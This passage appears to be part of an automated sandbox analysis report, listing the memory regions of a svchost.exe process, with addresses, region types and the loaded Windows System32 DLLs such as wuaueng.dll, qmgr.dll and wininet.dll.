start_va = 0x7ff6c6e1c000
end_va = 0x7ff6c6e1dfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e1c000"
filename = ""
Region:
id = 598
start_va = 0x7ff6c6e1e000
end_va = 0x7ff6c6e1ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e1e000"
filename = ""
Region:
id = 599
start_va = 0x7ff6c6e20000
end_va = 0x7ff6c6e21fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e20000"
filename = ""
Region:
id = 600
start_va = 0x7ff6c6e22000
end_va = 0x7ff6c6e23fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e22000"
filename = ""
Region:
id = 601
start_va = 0x7ff6c6e24000
end_va = 0x7ff6c6e25fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e24000"
filename = ""
Region:
id = 602
start_va = 0x7ff6c6e26000
end_va = 0x7ff6c6e27fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e26000"
filename = ""
Region:
id = 603
start_va = 0x7ff6c6e28000
end_va = 0x7ff6c6e29fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e28000"
filename = ""
Region:
id = 604
start_va = 0x7ff6c6e2a000
end_va = 0x7ff6c6e2bfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e2a000"
filename = ""
Region:
id = 605
start_va = 0x7ff6c6e2c000
end_va = 0x7ff6c6e2dfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e2c000"
filename = ""
Region:
id = 606
start_va = 0x7ff6c6e2e000
end_va = 0x7ff6c6e2ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e2e000"
filename = ""
Region:
id = 607
start_va = 0x7ff6c6e30000
end_va = 0x7ff6c6e31fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e30000"
filename = ""
Region:
id = 608
start_va = 0x7ff6c6e32000
end_va = 0x7ff6c6e33fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e32000"
filename = ""
Region:
id = 609
start_va = 0x7ff6c6e34000
end_va = 0x7ff6c6e35fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e34000"
filename = ""
Region:
id = 610
start_va = 0x7ff6c6e36000
end_va = 0x7ff6c6e37fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e36000"
filename = ""
Region:
id = 611
start_va = 0x7ff6c6e38000
end_va = 0x7ff6c6e39fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e38000"
filename = ""
Region:
id = 612
start_va = 0x7ff6c6e3a000
end_va = 0x7ff6c6e3bfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e3a000"
filename = ""
Region:
id = 613
start_va = 0x7ff6c6e3c000
end_va = 0x7ff6c6e3dfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e3c000"
filename = ""
Region:
id = 614
start_va = 0x7ff6c6e3e000
end_va = 0x7ff6c6e3ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e3e000"
filename = ""
Region:
id = 615
start_va = 0x7ff6c6e40000
end_va = 0x7ff6c6e41fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e40000"
filename = ""
Region:
id = 616
start_va = 0x7ff6c6e42000
end_va = 0x7ff6c6e43fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e42000"
filename = ""
Region:
id = 617
start_va = 0x7ff6c6e44000
end_va = 0x7ff6c6e45fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e44000"
filename = ""
Region:
id = 618
start_va = 0x7ff6c6e46000
end_va = 0x7ff6c6e47fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e46000"
filename = ""
Region:
id = 619
start_va = 0x7ff6c6e48000
end_va = 0x7ff6c6e49fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e48000"
filename = ""
Region:
id = 620
start_va = 0x7ff6c6e4a000
end_va = 0x7ff6c6e4bfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e4a000"
filename = ""
Region:
id = 621
start_va = 0x7ff6c6e4c000
end_va = 0x7ff6c6e4dfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e4c000"
filename = ""
Region:
id = 622
start_va = 0x7ff6c6e4e000
end_va = 0x7ff6c6e4ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e4e000"
filename = ""
Region:
id = 623
start_va = 0x7ff6c6e50000
end_va = 0x7ff6c6e51fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e50000"
filename = ""
Region:
id = 624
start_va = 0x7ff6c6e52000
end_va = 0x7ff6c6e53fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e52000"
filename = ""
Region:
id = 625
start_va = 0x7ff6c6e54000
end_va = 0x7ff6c6e55fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e54000"
filename = ""
Region:
id = 626
start_va = 0x7ff6c6e56000
end_va = 0x7ff6c6e57fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e56000"
filename = ""
Region:
id = 627
start_va = 0x7ff6c6e58000
end_va = 0x7ff6c6e59fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e58000"
filename = ""
Region:
id = 628
start_va = 0x7ff6c6e5a000
end_va = 0x7ff6c6e5bfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e5a000"
filename = ""
Region:
id = 629
start_va = 0x7ff6c6e5c000
end_va = 0x7ff6c6e5dfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e5c000"
filename = ""
Region:
id = 630
start_va = 0x7ff6c6e5e000
end_va = 0x7ff6c6e5ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e5e000"
filename = ""
Region:
id = 631
start_va = 0x7ff6c6e60000
end_va = 0x7ff6c6f5ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff6c6e60000"
filename = ""
Region:
id = 632
start_va = 0x7ff6c6f60000
end_va = 0x7ff6c6f82fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff6c6f60000"
filename = ""
Region:
id = 633
start_va = 0x7ff6c6f83000
end_va = 0x7ff6c6f84fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6f83000"
filename = ""
Region:
id = 634
start_va = 0x7ff6c6f85000
end_va = 0x7ff6c6f86fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6f85000"
filename = ""
Region:
id = 635
start_va = 0x7ff6c6f87000
end_va = 0x7ff6c6f88fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6f87000"
filename = ""
Region:
id = 636
start_va = 0x7ff6c6f89000
end_va = 0x7ff6c6f8afff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6f89000"
filename = ""
Region:
id = 637
start_va = 0x7ff6c6f8b000
end_va = 0x7ff6c6f8bfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6f8b000"
filename = ""
Region:
id = 638
start_va = 0x7ff6c6f8c000
end_va = 0x7ff6c6f8dfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6f8c000"
filename = ""
Region:
id = 639
start_va = 0x7ff6c6f8e000
end_va = 0x7ff6c6f8ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6f8e000"
filename = ""
Region:
id = 640
start_va = 0x7ff6c7e00000
end_va = 0x7ff6c7e0cfff
entry_point = 0x7ff6c7e00000
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 641
start_va = 0x7ffb23fb0000
end_va = 0x7ffb24007fff
entry_point = 0x7ffb23fb0000
region_type = mapped_file
name = "newdev.dll"
filename = "\\Windows\\System32\\newdev.dll" (normalized: "c:\\windows\\system32\\newdev.dll")
Region:
id = 642
start_va = 0x7ffb24010000
end_va = 0x7ffb24070fff
entry_point = 0x7ffb24010000
region_type = mapped_file
name = "wuuhext.dll"
filename = "\\Windows\\System32\\wuuhext.dll" (normalized: "c:\\windows\\system32\\wuuhext.dll")
Region:
id = 643
start_va = 0x7ffb24080000
end_va = 0x7ffb240d9fff
entry_point = 0x7ffb24080000
region_type = mapped_file
name = "usocore.dll"
filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll")
Region:
id = 644
start_va = 0x7ffb240e0000
end_va = 0x7ffb24309fff
entry_point = 0x7ffb240e0000
region_type = mapped_file
name = "wuaueng.dll"
filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll")
Region:
id = 645
start_va = 0x7ffb25270000
end_va = 0x7ffb25333fff
entry_point = 0x7ffb25270000
region_type = mapped_file
name = "wuapi.dll"
filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll")
Region:
id = 646
start_va = 0x7ffb253a0000
end_va = 0x7ffb253dffff
entry_point = 0x7ffb253a0000
region_type = mapped_file
name = "updatehandlers.dll"
filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll")
Region:
id = 647
start_va = 0x7ffb25e30000
end_va = 0x7ffb25e43fff
entry_point = 0x7ffb25e30000
region_type = mapped_file
name = "mskeyprotect.dll"
filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll")
Region:
id = 648
start_va = 0x7ffb25e50000
end_va = 0x7ffb25e77fff
entry_point = 0x7ffb25e50000
region_type = mapped_file
name = "dssenh.dll"
filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll")
Region:
id = 649
start_va = 0x7ffb25ee0000
end_va = 0x7ffb25efefff
entry_point = 0x7ffb25ee0000
region_type = mapped_file
name = "ncryptsslp.dll"
filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll")
Region:
id = 650
start_va = 0x7ffb28670000
end_va = 0x7ffb286f3fff
entry_point = 0x7ffb28670000
region_type = mapped_file
name = "winspool.drv"
filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv")
Region:
id = 651
start_va = 0x7ffb2ad30000
end_va = 0x7ffb2ad41fff
entry_point = 0x7ffb2ad30000
region_type = mapped_file
name = "bitsproxy.dll"
filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll")
Region:
id = 652
start_va = 0x7ffb2ae50000
end_va = 0x7ffb2aecffff
entry_point = 0x7ffb2ae50000
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 653
start_va = 0x7ffb2b090000
end_va = 0x7ffb2b0f5fff
entry_point = 0x7ffb2b090000
region_type = mapped_file
name = "upnp.dll"
filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll")
Region:
id = 654
start_va = 0x7ffb2b100000
end_va = 0x7ffb2b112fff
entry_point = 0x7ffb2b100000
region_type = mapped_file
name = "bitsigd.dll"
filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll")
Region:
id = 655
start_va = 0x7ffb2b120000
end_va = 0x7ffb2b12afff
entry_point = 0x7ffb2b120000
region_type = mapped_file
name = "bitsperf.dll"
filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll")
Region:
id = 656
start_va = 0x7ffb2b130000
end_va = 0x7ffb2b250fff
entry_point = 0x7ffb2b130000
region_type = mapped_file
name = "qmgr.dll"
filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll")
Region:
id = 657
start_va = 0x7ffb2d310000
end_va = 0x7ffb2d392fff
entry_point = 0x7ffb2d310000
region_type = mapped_file
name = "wbemess.dll"
filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")
Region:
id = 658
start_va = 0x7ffb2d450000
end_va = 0x7ffb2d465fff
entry_point = 0x7ffb2d450000
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 659
start_va = 0x7ffb2d470000
end_va = 0x7ffb2d547fff
entry_point = 0x7ffb2d470000
region_type = mapped_file
name = "wmiprvsd.dll"
filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")
Region:
id = 660
start_va = 0x7ffb2d690000
end_va = 0x7ffb2d6f2fff
entry_point = 0x7ffb2d690000
region_type = mapped_file
name = "repdrvfs.dll"
filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")
Region:
id = 661
start_va = 0x7ffb2d700000
end_va = 0x7ffb2d724fff
entry_point = 0x7ffb2d700000
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 662
start_va = 0x7ffb2d730000
end_va = 0x7ffb2d743fff
entry_point = 0x7ffb2d730000
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 663
start_va = 0x7ffb2d750000
end_va = 0x7ffb2d847fff
entry_point = 0x7ffb2d750000
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 664
start_va = 0x7ffb2d850000
end_va = 0x7ffb2d8c2fff
entry_point = 0x7ffb2d850000
region_type = mapped_file
name = "esscli.dll"
filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")
Region:
id = 665
start_va = 0x7ffb2d8d0000
end_va = 0x7ffb2da06fff
entry_point = 0x7ffb2d8d0000
region_type = mapped_file
name = "wbemcore.dll"
filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")
Region:
id = 666
start_va = 0x7ffb2dd30000
end_va = 0x7ffb2e199fff
entry_point = 0x7ffb2dd30000
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 667
start_va = 0x7ffb2e450000
end_va = 0x7ffb2e464fff
entry_point = 0x7ffb2e450000
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 668
start_va = 0x7ffb2e470000
end_va = 0x7ffb2e489fff
entry_point = 0x7ffb2e470000
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 669
start_va = 0x7ffb2e490000
end_va = 0x7ffb2e49cfff
entry_point = 0x7ffb2e490000
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 670
start_va = 0x7ffb2e4a0000
end_va = 0x7ffb2e4b0fff
entry_point = 0x7ffb2e4a0000
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 671
start_va = 0x7ffb2e4c0000
end_va = 0x7ffb2e53ffff
entry_point = 0x7ffb2e4c0000
region_type = mapped_file
name = "hnetcfg.dll"
filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll")
Region:
id = 672
start_va = 0x7ffb2e540000
end_va = 0x7ffb2e585fff
entry_point = 0x7ffb2e540000
region_type = mapped_file
name = "adsldp.dll"
filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll")
Region:
id = 673
start_va = 0x7ffb2e5a0000
end_va = 0x7ffb2e846fff
entry_point = 0x7ffb2e5a0000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 674
start_va = 0x7ffb2e850000
end_va = 0x7ffb2e860fff
entry_point = 0x7ffb2e850000
region_type = mapped_file
name = "credentialmigrationhandler.dll"
filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll")
Region:
id = 675
start_va = 0x7ffb2e8e0000
end_va = 0x7ffb2e8edfff
entry_point = 0x7ffb2e8e0000
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 676
start_va = 0x7ffb2e9c0000
end_va = 0x7ffb2e9d0fff
entry_point = 0x7ffb2e9c0000
region_type = mapped_file
name = "nci.dll"
filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll")
Region:
id = 677
start_va = 0x7ffb2e9e0000
end_va = 0x7ffb2ea3efff
entry_point = 0x7ffb2e9e0000
region_type = mapped_file
name = "wlanapi.dll"
filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll")
Region:
id = 678
start_va = 0x7ffb2ec80000
end_va = 0x7ffb2ec94fff
entry_point = 0x7ffb2ec80000
region_type = mapped_file
name = "ondemandconnroutehelper.dll"
filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll")
Region:
id = 679
start_va = 0x7ffb2eca0000
end_va = 0x7ffb2ecb0fff
entry_point = 0x7ffb2eca0000
region_type = mapped_file
name = "tetheringclient.dll"
filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll")
Region:
id = 680
start_va = 0x7ffb2ecc0000
end_va = 0x7ffb2ecd1fff
entry_point = 0x7ffb2ecc0000
region_type = mapped_file
name = "cscapi.dll"
filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")
Region:
id = 681
start_va = 0x7ffb2ece0000
end_va = 0x7ffb2ed1ffff
entry_point = 0x7ffb2ece0000
region_type = mapped_file
name = "adsldpc.dll"
filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll")
Region:
id = 682
start_va = 0x7ffb2ed20000
end_va = 0x7ffb2ed67fff
entry_point = 0x7ffb2ed20000
region_type = mapped_file
name = "activeds.dll"
filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll")
Region:
id = 683
start_va = 0x7ffb2ede0000
end_va = 0x7ffb2ee7efff
entry_point = 0x7ffb2ede0000
region_type = mapped_file
name = "clusapi.dll"
filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll")
Region:
id = 684
start_va = 0x7ffb2ee80000
end_va = 0x7ffb2eedafff
entry_point = 0x7ffb2ee80000
region_type = mapped_file
name = "resutils.dll"
filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll")
Region:
id = 685
start_va = 0x7ffb2eee0000
end_va = 0x7ffb2eef8fff
entry_point = 0x7ffb2eee0000
region_type = mapped_file
name = "usoapi.dll"
filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll")
Region:
id = 686
start_va = 0x7ffb2ef00000
end_va = 0x7ffb2ef16fff
entry_point = 0x7ffb2ef00000
region_type = mapped_file
name = "dmcmnutils.dll"
filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll")
Region:
id = 687
start_va = 0x7ffb2ef50000
end_va = 0x7ffb2efe6fff
entry_point = 0x7ffb2ef50000
region_type = mapped_file
name = "settingsync.dll"
filename = "\\Windows\\System32\\SettingSync.dll" (normalized: "c:\\windows\\system32\\settingsync.dll")
Region:
id = 688
start_va = 0x7ffb2eff0000
end_va = 0x7ffb2f01dfff
entry_point = 0x7ffb2eff0000
region_type = mapped_file
name = "wmidcom.dll"
filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll")
Region:
id = 689
start_va = 0x7ffb2f020000
end_va = 0x7ffb2f07cfff
entry_point = 0x7ffb2f020000
region_type = mapped_file
name = "miutils.dll"
filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll")
Region:
id = 690
start_va = 0x7ffb2f080000
end_va = 0x7ffb2f09ffff
entry_point = 0x7ffb2f080000
region_type = mapped_file
name = "mi.dll"
filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll")
Region:
id = 691
start_va = 0x7ffb2f0a0000
end_va = 0x7ffb2f0a7fff
entry_point = 0x7ffb2f0a0000
region_type = mapped_file
name = "sscoreext.dll"
filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll")
Region:
id = 692
start_va = 0x7ffb2f0b0000
end_va = 0x7ffb2f0c0fff
entry_point = 0x7ffb2f0b0000
region_type = mapped_file
name = "sscore.dll"
filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll")
Region:
id = 693
start_va = 0x7ffb2f150000
end_va = 0x7ffb2f164fff
entry_point = 0x7ffb2f150000
region_type = mapped_file
name = "ssdpapi.dll"
filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll")
Region:
id = 694
start_va = 0x7ffb2f370000
end_va = 0x7ffb2f3b0fff
entry_point = 0x7ffb2f370000
region_type = mapped_file
name = "wdscore.dll"
filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")
Region:
id = 695
start_va = 0x7ffb2f3c0000
end_va = 0x7ffb2f3dcfff
entry_point = 0x7ffb2f3c0000
region_type = mapped_file
name = "netsetupapi.dll"
filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll")
Region:
id = 696
start_va = 0x7ffb2f3e0000
end_va = 0x7ffb2f443fff
entry_point = 0x7ffb2f3e0000
region_type = mapped_file
name = "netsetupshim.dll"
filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll")
Region:
id = 697
start_va = 0x7ffb2f450000
end_va = 0x7ffb2f731fff
entry_point = 0x7ffb2f450000
region_type = mapped_file
name = "esent.dll"
filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll")
Region:
id = 698
start_va = 0x7ffb2f780000
end_va = 0x7ffb2f7cbfff
entry_point = 0x7ffb2f780000
region_type = mapped_file
name = "srvsvc.dll"
filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")
Region:
id = 699
start_va = 0x7ffb2f7d0000
end_va = 0x7ffb2fa46fff
entry_point = 0x7ffb2f7d0000
region_type = mapped_file
name = "msxml6.dll"
filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll")
Region:
id = 700
start_va = 0x7ffb2fa50000
end_va = 0x7ffb2fa8efff
entry_point = 0x7ffb2fa50000
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 701
start_va = 0x7ffb2fa90000
end_va = 0x7ffb2faa7fff
entry_point = 0x7ffb2fa90000
region_type = mapped_file
name = "adhsvc.dll"
filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll")
Region:
id = 702
start_va = 0x7ffb2fab0000
end_va = 0x7ffb2fad2fff
entry_point = 0x7ffb2fab0000
region_type = mapped_file
name = "httpprxm.dll"
filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll")
Region:
id = 703
start_va = 0x7ffb30240000
end_va = 0x7ffb30256fff
entry_point = 0x7ffb30240000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 704
start_va = 0x7ffb30760000
end_va = 0x7ffb307a4fff
entry_point = 0x7ffb30760000
region_type = mapped_file
name = "sqmapi.dll"
filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")
Region:
id = 705
start_va = 0x7ffb307b0000
end_va = 0x7ffb308a0fff
entry_point = 0x7ffb307b0000
region_type = mapped_file
name = "iphlpsvc.dll"
filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")
Region:
id = 706
start_va = 0x7ffb308c0000
end_va = 0x7ffb308c9fff
entry_point = 0x7ffb308c0000
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 707
start_va = 0x7ffb30ce0000
end_va = 0x7ffb30ce7fff
entry_point = 0x7ffb30ce0000
region_type = mapped_file
name = "dmiso8601utils.dll"
filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll")
Region:
id = 708
start_va = 0x7ffb30cf0000
end_va = 0x7ffb30d0cfff
entry_point = 0x7ffb30cf0000
region_type = mapped_file
name = "updatepolicy.dll"
filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll")
Region:
id = 709
start_va = 0x7ffb30d60000
end_va = 0x7ffb30d72fff
entry_point = 0x7ffb30d60000
region_type = mapped_file
name = "devrtl.dll"
filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")
Region:
id = 710
start_va = 0x7ffb30d80000
end_va = 0x7ffb30d93fff
entry_point = 0x7ffb30d80000
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 711
start_va = 0x7ffb30db0000
end_va = 0x7ffb30dccfff
entry_point = 0x7ffb30db0000
region_type = mapped_file
name = "appinfo.dll"
filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll")
Region:
id = 712
start_va = 0x7ffb332f0000
end_va = 0x7ffb33321fff
entry_point = 0x7ffb332f0000
region_type = mapped_file
name = "shacct.dll"
filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll")
Region:
id = 713
start_va = 0x7ffb33330000
end_va = 0x7ffb333aefff
entry_point = 0x7ffb33330000
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 714
start_va = 0x7ffb333b0000
end_va = 0x7ffb333ebfff
entry_point = 0x7ffb333b0000
region_type = mapped_file
name = "wmisvc.dll"
filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")
Region:
id = 715
start_va = 0x7ffb333f0000
end_va = 0x7ffb334c5fff
entry_point = 0x7ffb333f0000
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 716
start_va = 0x7ffb334d0000
end_va = 0x7ffb334dbfff
entry_point = 0x7ffb334d0000
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 717
start_va = 0x7ffb33530000
end_va = 0x7ffb33547fff
entry_point = 0x7ffb33530000
region_type = mapped_file
name = "vsstrace.dll"
filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll")
Region:
id = 718
start_va = 0x7ffb33550000
end_va = 0x7ffb336d2fff
entry_point = 0x7ffb33550000
region_type = mapped_file
name = "vssapi.dll"
filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll")
Region:
id = 719
start_va = 0x7ffb33750000
end_va = 0x7ffb33a8cfff
entry_point = 0x7ffb33750000
region_type = mapped_file
name = "msi.dll"
filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll")
Region:
id = 720
start_va = 0x7ffb34f40000
end_va = 0x7ffb34f66fff
entry_point = 0x7ffb34f40000
region_type = mapped_file
name = "cabinet.dll"
filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")
Region:
id = 721
start_va = 0x7ffb350b0000
end_va = 0x7ffb35141fff
entry_point = 0x7ffb350b0000
region_type = mapped_file
name = "msvcp110_win.dll"
filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll")
Region:
id = 722
start_va = 0x7ffb35150000
end_va = 0x7ffb35188fff
entry_point = 0x7ffb35150000
region_type = mapped_file
name = "policymanager.dll"
filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll")
Region:
id = 723
